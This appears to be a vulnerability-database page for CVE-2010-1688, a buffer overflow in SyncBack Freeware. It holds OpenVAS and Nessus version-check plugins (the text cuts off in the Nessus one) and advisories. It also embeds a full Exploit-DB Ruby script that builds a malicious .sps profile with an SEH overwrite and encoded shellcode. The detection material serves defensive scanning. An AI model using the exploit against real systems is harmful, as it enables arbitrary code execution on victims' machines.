ID OPENVAS:902057 Type openvas Reporter Copyright (C) 2010 SecPod Modified 2017-02-20T00:00:00
Description
This host is installed with SyncBack Freeware and is prone
to buffer overflow vulnerability.
###############################################################################
# OpenVAS Vulnerability Test
# $Id: secpod_syncback_freeware_bof_vuln.nasl 5368 2017-02-20 14:34:16Z cfi $
#
# SyncBack Profile Import Buffer Overflow Vulnerability
#
# Authors:
# Madhuri D <dmadhuri@secpod.com>
#
# Copyright:
# Copyright (c) 2010 SecPod, http://www.secpod.com
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2
# (or any later version), as published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
###############################################################################
tag_impact = "Successful exploitation will allow remote attackers to execute arbitrary code.
Impact Level: Application.";
tag_affected = "SyncBack Freeware version prior to 3.2.21";
tag_insight = "The flaw exists due to boundary error when importing 'SyncBack' profiles,
which leads to stack-based buffer overflow when a user opens a specially
crafted '.sps' file.";
tag_solution = "Upgrade to the SyncBack Freeware version 3.2.21
For updates refer to http://www.2brightsparks.com/downloads.html#freeware";
tag_summary = "This host is installed with SyncBack Freeware and is prone
to buffer overflow vulnerability.";
if(description)
{
script_id(902057);
script_version("$Revision: 5368 $");
script_tag(name:"last_modification", value:"$Date: 2017-02-20 15:34:16 +0100 (Mon, 20 Feb 2017) $");
script_tag(name:"creation_date", value:"2010-05-28 16:52:49 +0200 (Fri, 28 May 2010)");
script_cve_id("CVE-2010-1688");
script_bugtraq_id(40311);
script_tag(name:"cvss_base", value:"9.3");
script_tag(name:"cvss_base_vector", value:"AV:N/AC:M/Au:N/C:C/I:C/A:C");
script_name("SyncBack Profile Import Buffer Overflow Vulnerability");
script_xref(name : "URL" , value : "http://secunia.com/advisories/39865");
script_xref(name : "URL" , value : "http://xforce.iss.net/xforce/xfdb/58727");
script_tag(name:"qod_type", value:"executable_version");
script_category(ACT_GATHER_INFO);
script_copyright("Copyright (C) 2010 SecPod");
script_family("Buffer overflow");
script_dependencies("secpod_reg_enum.nasl");
script_mandatory_keys("SMB/WindowsVersion");
script_require_ports(139, 445);
script_tag(name : "insight" , value : tag_insight);
script_tag(name : "solution" , value : tag_solution);
script_tag(name : "summary" , value : tag_summary);
script_tag(name : "impact" , value : tag_impact);
script_tag(name : "affected" , value : tag_affected);
exit(0);
}
include("smb_nt.inc");
include("version_func.inc");
include("secpod_smb_func.inc");
if(!get_kb_item("SMB/WindowsVersion")){
exit(0);
}
key = "SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" +
"\SyncBack_is1";
if(!registry_key_exists(key:key)){
exit(0);
}
## Check for SyncBack Freeware DisplayName
syncName = registry_get_sz(key:key, item:"DisplayName");
if("SyncBack" >< syncName)
{
## Check for Installation path of SyncBack Freeware
syncPath = registry_get_sz(key:key, item:"InstallLocation");
if(!isnull(syncPath))
{
exePath = syncPath + "\SyncBack.exe";
share = ereg_replace(pattern:"([A-Z]):.*", replace:"\1$", string:exePath);
fire = ereg_replace(pattern:"[A-Z]:(.*)", replace:"\1", string:exePath);
## Check for SyncBack Freeware .exe File Version
syncVer = GetVer(file:fire, share:share);
if(syncVer != NULL)
{
## Check for SyncBack Freeware version less than 3.2.21
if(version_is_less(version:syncVer, test_version:"3.2.21.0")){
security_message(0) ;
}
}
}
}
{"href": "http://plugins.openvas.org/nasl.php?oid=902057", "history": [], "naslFamily": "Buffer overflow", "id": "OPENVAS:902057", "reporter": "Copyright (C) 2010 SecPod", "published": "2010-05-28T00:00:00", "description": "This host is installed with SyncBack Freeware and is prone\n to buffer overflow vulnerability.", "title": "SyncBack Profile Import Buffer Overflow Vulnerability", "bulletinFamily": "scanner", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: secpod_syncback_freeware_bof_vuln.nasl 5368 2017-02-20 14:34:16Z cfi $\n#\n# SyncBack Profile Import Buffer Overflow Vulnerability\n#\n# Authors:\n# Madhuri D <dmadhuri@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2010 SecPod, http://www.secpod.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_impact = \"Successful exploitation will allow remote attackers to execute arbitrary code.\n Impact Level: Application.\";\ntag_affected = \"SyncBack Freeware version prior to 3.2.21\";\n\ntag_insight = \"The flaw exists due to boundary error when importing 'SyncBack' profiles,\n which leads to stack-based buffer overflow when a user opens a specially\n crafted '.sps' file.\";\ntag_solution = \"Upgrade to the SyncBack Freeware version 3.2.21\n For updates refer to http://www.2brightsparks.com/downloads.html#freeware\";\ntag_summary = \"This host is installed with SyncBack Freeware and is prone\n to buffer overflow vulnerability.\";\n\nif(description)\n{\n script_id(902057);\n script_version(\"$Revision: 5368 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-02-20 15:34:16 +0100 (Mon, 20 Feb 2017) $\");\n script_tag(name:\"creation_date\", value:\"2010-05-28 16:52:49 +0200 (Fri, 28 May 2010)\");\n script_cve_id(\"CVE-2010-1688\");\n script_bugtraq_id(40311);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_name(\"SyncBack Profile Import Buffer Overflow Vulnerability\");\n script_xref(name : \"URL\" , value : \"http://secunia.com/advisories/39865\");\n script_xref(name : \"URL\" , value : \"http://xforce.iss.net/xforce/xfdb/58727\");\n\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2010 SecPod\");\n script_family(\"Buffer overflow\");\n script_dependencies(\"secpod_reg_enum.nasl\");\n script_mandatory_keys(\"SMB/WindowsVersion\");\n script_require_ports(139, 445);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n exit(0);\n}\n\n\ninclude(\"smb_nt.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(!get_kb_item(\"SMB/WindowsVersion\")){\n exit(0);\n}\n\nkey = \"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\" +\n \"\\SyncBack_is1\";\n\nif(!registry_key_exists(key:key)){\n exit(0);\n}\n\n## Check for SyncBack Freeware DisplayName\nsyncName = registry_get_sz(key:key, item:\"DisplayName\");\nif(\"SyncBack\" >< syncName)\n{\n ## Check for Installation path of SyncBack Freeware\n syncPath = registry_get_sz(key:key, item:\"InstallLocation\");\n\n if(!isnull(syncPath))\n {\n exePath = syncPath + \"\\SyncBack.exe\";\n share = ereg_replace(pattern:\"([A-Z]):.*\", replace:\"\\1$\", string:exePath);\n fire = ereg_replace(pattern:\"[A-Z]:(.*)\", replace:\"\\1\", string:exePath);\n\n ## Check for SyncBack Freeware .exe File Version\n syncVer = GetVer(file:fire, share:share);\n if(syncVer != NULL)\n {\n ## Check for SyncBack Freeware version less than 3.2.21\n if(version_is_less(version:syncVer, test_version:\"3.2.21.0\")){\n security_message(0) ;\n }\n }\n }\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "pluginID": "902057", "hash": "788b1daa798e380583fdd3d8df2ea9fba30b4caf95365bd2a676706f3f1905e3", "references": ["http://secunia.com/advisories/39865", "http://xforce.iss.net/xforce/xfdb/58727"], "edition": 1, "cvelist": ["CVE-2010-1688"], "lastseen": "2017-07-02T21:09:49", "viewCount": 0, "enchantments": {"score": {"value": 8.5, "vector": "NONE", "modified": "2017-07-02T21:09:49"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2010-1688"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310902057"]}, {"type": "kaspersky", "idList": ["KLA10044"]}, {"type": "exploitdb", "idList": ["EDB-ID:12662"]}, {"type": "nessus", "idList": ["SYNCBACK_3_2_21.NASL"]}], "modified": "2017-07-02T21:09:49"}, "vulnersScore": 8.5}, "hashmap": [{"key": "bulletinFamily", "hash": "bbdaea376f500d25f6b0c1050311dd07"}, {"key": "cvelist", "hash": "530ce2457db7804579204330f917a6ef"}, {"key": "cvss", "hash": "2076413bdcb42307d016f5286cbae795"}, {"key": "description", "hash": "5a11e9466cfccb8579219be0e9911978"}, {"key": "href", "hash": "8ca7c75639cc173d756048eccc31b24f"}, {"key": "modified", "hash": "c2eea933d97966be19ceab275cbda399"}, {"key": "naslFamily", "hash": "b9cc6a9f33ec12abd4e976263afc3918"}, {"key": "pluginID", "hash": "d133d1344ad921a4f71cf8debc2708b2"}, {"key": "published", "hash": "86510ed53691b7908974119505cd05ba"}, {"key": "references", "hash": "f8ded739408dfd4a86fdde80ff418fdc"}, {"key": "reporter", "hash": "87992e4ee7e99091c51bc97e171d5f33"}, {"key": "sourceData", "hash": "bccc638b9e8492e689a633e93b291ca3"}, {"key": "title", "hash": "fa6ea57c10b8134b9bf3013ec1167d52"}, {"key": "type", "hash": "47c1f692ea47a21f716dad07043ade01"}], "objectVersion": "1.3", "modified": "2017-02-20T00:00:00"}
{"cve": [{"lastseen": "2019-05-29T18:10:27", "bulletinFamily": "NVD", "description": "Stack-based buffer overflow in 2BrightSparks SyncBack Freeware 3.2.20.0, and possibly other versions before 3.2.21, allows user-assisted remote attackers to execute arbitrary code via a long filename in a (1) .sps or (2) zip profile.", "modified": "2017-08-17T01:32:00", "id": "CVE-2010-1688", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-1688", "published": "2010-05-24T19:30:00", "title": "CVE-2010-1688", "type": "cve", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "openvas": [{"lastseen": "2019-05-29T18:40:12", "bulletinFamily": "scanner", "description": "This host is installed with SyncBack Freeware and is prone\n to buffer overflow vulnerability.", "modified": "2018-11-30T00:00:00", "published": "2010-05-28T00:00:00", "id": "OPENVAS:1361412562310902057", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310902057", "title": "SyncBack Profile Import Buffer Overflow Vulnerability", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: secpod_syncback_freeware_bof_vuln.nasl 12602 2018-11-30 14:36:58Z cfischer $\n#\n# SyncBack Profile Import Buffer Overflow Vulnerability\n#\n# Authors:\n# Madhuri D <dmadhuri@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2010 SecPod, http://www.secpod.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.902057\");\n script_version(\"$Revision: 12602 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-30 15:36:58 +0100 (Fri, 30 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2010-05-28 16:52:49 +0200 (Fri, 28 May 2010)\");\n script_cve_id(\"CVE-2010-1688\");\n script_bugtraq_id(40311);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_name(\"SyncBack Profile Import Buffer Overflow Vulnerability\");\n script_xref(name:\"URL\", value:\"http://secunia.com/advisories/39865\");\n script_xref(name:\"URL\", value:\"http://xforce.iss.net/xforce/xfdb/58727\");\n\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2010 SecPod\");\n script_family(\"Buffer overflow\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_mandatory_keys(\"SMB/WindowsVersion\");\n script_require_ports(139, 445);\n script_tag(name:\"insight\", value:\"The flaw exists due to boundary error when importing 'SyncBack' profiles,\n which leads to stack-based buffer overflow when a user opens a specially\n crafted '.sps' file.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"solution\", value:\"Upgrade to the SyncBack Freeware version 3.2.21\");\n script_tag(name:\"summary\", value:\"This host is installed with SyncBack Freeware and is prone\n to buffer overflow vulnerability.\");\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote attackers to execute arbitrary code.\");\n script_tag(name:\"affected\", value:\"SyncBack Freeware version prior to 3.2.21\");\n script_xref(name:\"URL\", value:\"http://www.2brightsparks.com/downloads.html#freeware\");\n exit(0);\n}\n\n\ninclude(\"smb_nt.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(!get_kb_item(\"SMB/WindowsVersion\")){\n exit(0);\n}\n\nkey = \"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\" +\n \"\\SyncBack_is1\";\n\nif(!registry_key_exists(key:key)){\n exit(0);\n}\n\nsyncName = registry_get_sz(key:key, item:\"DisplayName\");\nif(\"SyncBack\" >< syncName)\n{\n syncPath = registry_get_sz(key:key, item:\"InstallLocation\");\n\n if(!isnull(syncPath))\n {\n exePath = syncPath + \"\\SyncBack.exe\";\n share = ereg_replace(pattern:\"([A-Z]):.*\", replace:\"\\1$\", string:exePath);\n fire = ereg_replace(pattern:\"[A-Z]:(.*)\", replace:\"\\1\", string:exePath);\n\n syncVer = GetVer(file:fire, share:share);\n if(syncVer != NULL)\n {\n if(version_is_less(version:syncVer, test_version:\"3.2.21.0\")){\n security_message( port: 0, data: \"The target host was found to be vulnerable\" ) ;\n }\n }\n }\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "kaspersky": [{"lastseen": "2019-03-21T00:15:00", "bulletinFamily": "info", "description": "### *Detect date*:\n05/24/2010\n\n### *Severity*:\nCritical\n\n### *Description*:\nA buffer overflow vulnerability was found at 2BrightSparks SyncBack. Malicious users can exploit this vulnerability to execute arbitrary code via a specially designed filename.\n\n### *Affected products*:\n2BrightSparks SyncBack Freeware version 3.2.20.0\n\n### *Solution*:\nUpdate to latest version\n\n### *Original advisories*:\n[Change log](<http://www.2brightsparks.com/freeware/changes.html>) \n[Vulnerability description](<http://www.cvedetails.com/cve/CVE-2010-1688/>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[2BrightSparks SyncBack](<https://threats.kaspersky.com/en/product/2BrightSparks-SyncBack/>)\n\n### *CVE-IDS*:\n[CVE-2010-1688](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1688>)9.3Critical", "modified": "2019-03-07T00:00:00", "published": "2010-05-24T00:00:00", "id": "KLA10044", "href": "https://threats.kaspersky.com/en/vulnerability/KLA10044", "title": "\r KLA10044ACE vulnerability in 2BrightSparks SyncBack ", "type": "kaspersky", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "exploitdb": [{"lastseen": "2016-02-01T17:03:55", "bulletinFamily": "exploit", "description": "SyncBack Freeware V3.2.20.0. CVE-2010-1688. Local exploit for windows platform", "modified": "2010-05-19T00:00:00", "published": "2010-05-19T00:00:00", "id": "EDB-ID:12662", "href": "https://www.exploit-db.com/exploits/12662/", "type": "exploitdb", "title": "SyncBack Freeware 3.2.20.0", "sourceData": "#!/usr/bin/ruby\r\n# Software : SyncBack Freeware V3.2.20.0\r\n# Author : Lincoln\r\n# Date : May 19, 2010\r\n# Reference : http://www.corelan.be:8800/advisories.php?id=CORELAN-10-041\r\n# OS : Windows\r\n# Tested on : XP SP3 En (VirtualBox)\r\n# Type of vuln : SEH\r\n# Greetz to : Corelan Security Team\r\n# http://www.corelan.be:8800/index.php/security/corelan-team-members/\r\n#\r\n# Script provided 'as is', without any warranty.\r\n# Use for educational purposes only.\r\n# Do not use this code to do anything illegal !\r\n#\r\n# Note : you are not allowed to edit/modify this code.\r\n# If you do, Corelan cannot be held responsible for any damages this may cause.\r\n#\r\n#\r\nbanner =\r\n\"|------------------------------------------------------------------|\\n\" +\r\n\"| __ __ |\\n\" +\r\n\"| _________ ________ / /___ _____ / /____ ____ _____ ___ |\\n\" +\r\n\"| / ___/ __ \\\\/ ___/ _ \\\\/ / __ `/ __ \\\\ / __/ _ \\\\/ __ `/ __ `__ \\\\ |\\n\" +\r\n\"| / /__/ /_/ / / / __/ / /_/ / / / / / /_/ __/ /_/ / / / / / / |\\n\" +\r\n\"| \\\\___/\\\\____/_/ \\\\___/_/\\\\__,_/_/ /_/ \\\\__/\\\\___/\\\\__,_/_/ /_/ /_/ |\\n\" +\r\n\"| |\\n\" +\r\n\"| http://www.corelan.be:8800 |\\n\" +\r\n\"| |\\n\" +\r\n\"|-------------------------------------------------[ EIP Hunters ]--|\\n\\n\"\r\n\r\nprint banner\r\nputs \"[+] Exploit for SyncBack Freeware V3.2.20.0\"\r\n\r\n#Zip Headers\r\nheader1=\r\n\"\\x50\\x4B\\x03\\x04\\x14\\x00\\x00\\x00\" +\r\n\"\\x00\\x00\\xB7\\xAC\\xCE\\x34\\x00\\x00\" +\r\n\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\" +\r\n\"\\x00\\xb8\\x0b\\x00\\x00\\x00\"\r\n\r\nheader2=\r\n\"\\x50\\x4B\\x01\\x02\\x14\\x00\\x14\\x00\" +\r\n\"\\x00\\x00\\x00\\x00\\xB7\\xAC\\xCE\\x34\" +\r\n\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\" +\r\n\"\\x00\\x00\\x00\\x00\\xb8\\x0b\\x00\\x00\" +\r\n\"\\x00\\x00\\x00\\x00\\x01\\x00\\x24\\x00\" +\r\n\"\\x00\\x00\\x00\\x00\\x00\\x00\"\r\n\r\nheader3=\r\n\"\\x50\\x4B\\x05\\x06\\x00\\x00\\x00\\x00\" +\r\n\"\\x01\\x00\\x01\\x00\\xe6\\x0b\\x00\\x00\" +\r\n\"\\xd6\\x0b\\x00\\x00\\x00\\x00\"\r\n\r\n#sub cx,b38 / call ecx\r\nalign =\r\n\"\\x66\\x81\\xe9\\x38\\x0b\\xff\\xd1\"\r\n\r\n#msgbox: \"Exploited by Corelan Security Team\"\r\nshellcode =\r\n\"\\x89\\xe3\\xda\\xd7\\xd9\\x73\\xf4\\x59\\x49\\x49\\x49\\x49\\x49\\x49\" +\r\n\"\\x49\\x49\\x49\\x49\\x49\\x43\\x43\\x43\\x43\\x43\\x43\\x37\\x51\\x5a\" +\r\n\"\\x6a\\x41\\x58\\x50\\x30\\x41\\x30\\x41\\x6b\\x41\\x41\\x51\\x32\\x41\" +\r\n\"\\x42\\x32\\x42\\x42\\x30\\x42\\x42\\x41\\x42\\x58\\x50\\x38\\x41\\x42\" +\r\n\"\\x75\\x4a\\x49\\x4a\\x79\\x4a\\x4b\\x4d\\x4b\\x4b\\x69\\x51\\x64\\x45\" +\r\n\"\\x74\\x4a\\x54\\x45\\x61\\x4e\\x32\\x4e\\x52\\x42\\x5a\\x46\\x51\\x49\" +\r\n\"\\x59\\x42\\x44\\x4e\\x6b\\x51\\x61\\x44\\x70\\x4c\\x4b\\x43\\x46\\x44\" +\r\n\"\\x4c\\x4e\\x6b\\x42\\x56\\x47\\x6c\\x4c\\x4b\\x51\\x56\\x44\\x48\\x4c\" +\r\n\"\\x4b\\x51\\x6e\\x45\\x70\\x4e\\x6b\\x45\\x66\\x50\\x38\\x50\\x4f\\x47\" +\r\n\"\\x68\\x50\\x75\\x4c\\x33\\x50\\x59\\x45\\x51\\x4b\\x61\\x4b\\x4f\\x48\" +\r\n\"\\x61\\x51\\x70\\x4c\\x4b\\x50\\x6c\\x46\\x44\\x45\\x74\\x4c\\x4b\\x51\" +\r\n\"\\x55\\x47\\x4c\\x4c\\x4b\\x50\\x54\\x43\\x35\\x50\\x78\\x43\\x31\\x4b\" +\r\n\"\\x5a\\x4c\\x4b\\x42\\x6a\\x47\\x68\\x4e\\x6b\\x43\\x6a\\x47\\x50\\x45\" +\r\n\"\\x51\\x4a\\x4b\\x48\\x63\\x46\\x57\\x50\\x49\\x4e\\x6b\\x44\\x74\\x4c\" +\r\n\"\\x4b\\x45\\x51\\x4a\\x4e\\x44\\x71\\x49\\x6f\\x50\\x31\\x4b\\x70\\x4b\" +\r\n\"\\x4c\\x4e\\x4c\\x4f\\x74\\x4b\\x70\\x43\\x44\\x46\\x6a\\x4a\\x61\\x4a\" +\r\n\"\\x6f\\x44\\x4d\\x47\\x71\\x4b\\x77\\x48\\x69\\x4a\\x51\\x4b\\x4f\\x49\" +\r\n\"\\x6f\\x49\\x6f\\x45\\x6b\\x43\\x4c\\x45\\x74\\x51\\x38\\x51\\x65\\x49\" +\r\n\"\\x4e\\x4e\\x6b\\x42\\x7a\\x45\\x74\\x45\\x51\\x4a\\x4b\\x43\\x56\\x4e\" +\r\n\"\\x6b\\x46\\x6c\\x42\\x6b\\x4c\\x4b\\x43\\x6a\\x45\\x4c\\x43\\x31\\x4a\" +\r\n\"\\x4b\\x4e\\x6b\\x45\\x54\\x4e\\x6b\\x47\\x71\\x4d\\x38\\x4f\\x79\\x51\" +\r\n\"\\x54\\x46\\x44\\x47\\x6c\\x45\\x31\\x4a\\x63\\x4f\\x42\\x44\\x48\\x46\" +\r\n\"\\x49\\x48\\x54\\x4f\\x79\\x4b\\x55\\x4d\\x59\\x49\\x52\\x50\\x68\\x4c\" +\r\n\"\\x4e\\x50\\x4e\\x44\\x4e\\x48\\x6c\\x50\\x52\\x4b\\x58\\x4d\\x4c\\x4b\" +\r\n\"\\x4f\\x49\\x6f\\x4b\\x4f\\x4f\\x79\\x51\\x55\\x46\\x64\\x4d\\x6b\\x51\" +\r\n\"\\x6e\\x49\\x48\\x4d\\x32\\x51\\x63\\x4c\\x47\\x45\\x4c\\x44\\x64\\x51\" +\r\n\"\\x42\\x4d\\x38\\x4e\\x6b\\x49\\x6f\\x49\\x6f\\x4b\\x4f\\x4c\\x49\\x42\" +\r\n\"\\x65\\x47\\x78\\x43\\x58\\x42\\x4c\\x50\\x6c\\x45\\x70\\x4b\\x4f\\x51\" +\r\n\"\\x78\\x47\\x43\\x45\\x62\\x46\\x4e\\x45\\x34\\x45\\x38\\x51\\x65\\x51\" +\r\n\"\\x63\\x45\\x35\\x44\\x32\\x4d\\x58\\x51\\x4c\\x44\\x64\\x44\\x4a\\x4c\" +\r\n\"\\x49\\x48\\x66\\x43\\x66\\x4b\\x4f\\x43\\x65\\x46\\x64\\x4c\\x49\\x4b\" +\r\n\"\\x72\\x50\\x50\\x4d\\x6b\\x4e\\x48\\x4c\\x62\\x50\\x4d\\x4d\\x6c\\x4e\" +\r\n\"\\x67\\x47\\x6c\\x47\\x54\\x46\\x32\\x4b\\x58\\x43\\x6e\\x49\\x6f\\x49\" +\r\n\"\\x6f\\x49\\x6f\\x42\\x48\\x51\\x74\\x45\\x71\\x51\\x48\\x45\\x70\\x43\" +\r\n\"\\x58\\x44\\x30\\x43\\x47\\x42\\x4e\\x42\\x45\\x44\\x71\\x4b\\x6b\\x4b\" +\r\n\"\\x38\\x43\\x6c\\x45\\x74\\x46\\x66\\x4b\\x39\\x48\\x63\\x45\\x38\\x50\" +\r\n\"\\x61\\x42\\x4d\\x50\\x58\\x45\\x70\\x51\\x78\\x42\\x59\\x45\\x70\\x50\" +\r\n\"\\x54\\x51\\x75\\x51\\x78\\x44\\x35\\x43\\x42\\x50\\x69\\x51\\x64\\x43\" +\r\n\"\\x58\\x51\\x30\\x43\\x63\\x45\\x35\\x43\\x53\\x51\\x78\\x42\\x45\\x42\" +\r\n\"\\x4c\\x50\\x61\\x50\\x6e\\x42\\x48\\x51\\x30\\x51\\x53\\x50\\x6f\\x50\" +\r\n\"\\x72\\x45\\x38\\x43\\x54\\x51\\x30\\x50\\x62\\x43\\x49\\x51\\x78\\x42\" +\r\n\"\\x4f\\x43\\x59\\x42\\x54\\x50\\x65\\x51\\x78\\x42\\x65\\x51\\x68\\x42\" +\r\n\"\\x50\\x50\\x6c\\x46\\x51\\x48\\x49\\x4e\\x68\\x50\\x4c\\x46\\x44\\x45\" +\r\n\"\\x72\\x4d\\x59\\x49\\x71\\x44\\x71\\x4a\\x72\\x43\\x62\\x43\\x63\\x50\" +\r\n\"\\x51\\x46\\x32\\x4b\\x4f\\x48\\x50\\x50\\x31\\x4f\\x30\\x46\\x30\\x4b\" +\r\n\"\\x4f\\x51\\x45\\x44\\x48\\x45\\x5a\\x41\\x41\"\r\n\r\nsize = 2996\r\njunk = \"\\x90\" * (276 - align.length)\r\n\r\nnseh = \"\\x5c\\x61\\x98\\xa0\" #pop esp / pop ad / jmp ecx\r\nseh = \"\\x4a\\x6b\\x40\\x00\" #universal p/p retn 8\r\n\r\npayload = junk + align + nseh + seh + shellcode\r\nrest = \"D\" * (size - payload.length)\r\nfinal = payload + rest + \".txt\"\r\n\r\nfilename = \"Sync.sps\"\r\nf = File.new(filename, 'w')\r\nf.write header1 + final + header2 + final + header3\r\nf.close\r\n\r\nputs \"[+] file size : #{final.length}\"\r\nputs \"[+] Wrote exploit file : #{filename}\"\r\nputs \"[+] Import SyncBack profile and boom!\\n\\n\"", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/12662/"}], "nessus": [{"lastseen": "2019-11-03T12:30:15", "bulletinFamily": "scanner", "description": "The remote Windows host contains a version of SyncBack that is earlier\nthan 3.2.21. Such versions are prone to a remote buffer overflow\nattack.\n\nAn attacker may exploit this issue to execute arbitrary code in the\ncontext of the vulnerable application by tricking the user into\nimporting a malicious profile file.", "modified": "2019-11-02T00:00:00", "id": "SYNCBACK_3_2_21.NASL", "href": "https://www.tenable.com/plugins/nessus/46733", "published": "2010-05-26T00:00:00", "title": "SyncBack Profile File Remote Buffer Overflow", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\ninclude(\"compat.inc\");\n\n\nif (description)\n{\n script_id(46733);\n script_version(\"1.11\");\n script_cvs_date(\"Date: 2018/11/15 20:50:29\");\n\n script_cve_id(\"CVE-2010-1688\");\n script_bugtraq_id(40311);\n script_xref(name:\"EDB-ID\", value:\"12662\");\n script_xref(name:\"Secunia\", value:\"39865\");\n\n script_name(english:\"SyncBack Profile File Remote Buffer Overflow\");\n script_summary(english:\"Checks version of SyncBack.exe\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host contains a program that is prone to a remote\nbuffer overflow attack.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host contains a version of SyncBack that is earlier\nthan 3.2.21. Such versions are prone to a remote buffer overflow\nattack.\n\nAn attacker may exploit this issue to execute arbitrary code in the\ncontext of the vulnerable application by tricking the user into\nimporting a malicious profile file.\");\n # http://www.corelan.be:8800/index.php/forum/security-advisories/corelan-10-041-syncback-freeware-v3-2-20-0/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?db9db69b\");\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.2brightsparks.com/freeware/changes.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Upgrade to SyncBack version 3.2.21 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2010/05/19\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/05/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/05/26\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2010-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"smb_hotfixes.nasl\");\n script_require_keys(\"SMB/Registry/Enumerated\");\n script_require_ports(139, 445);\n\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"audit.inc\");\n\nlist = get_kb_list(\"SMB/Registry/HKLM/SOFTWARE/Microsoft/Windows/CurrentVersion/Uninstall/*/DisplayName\");\nif (isnull(list)) exit(1,\"The 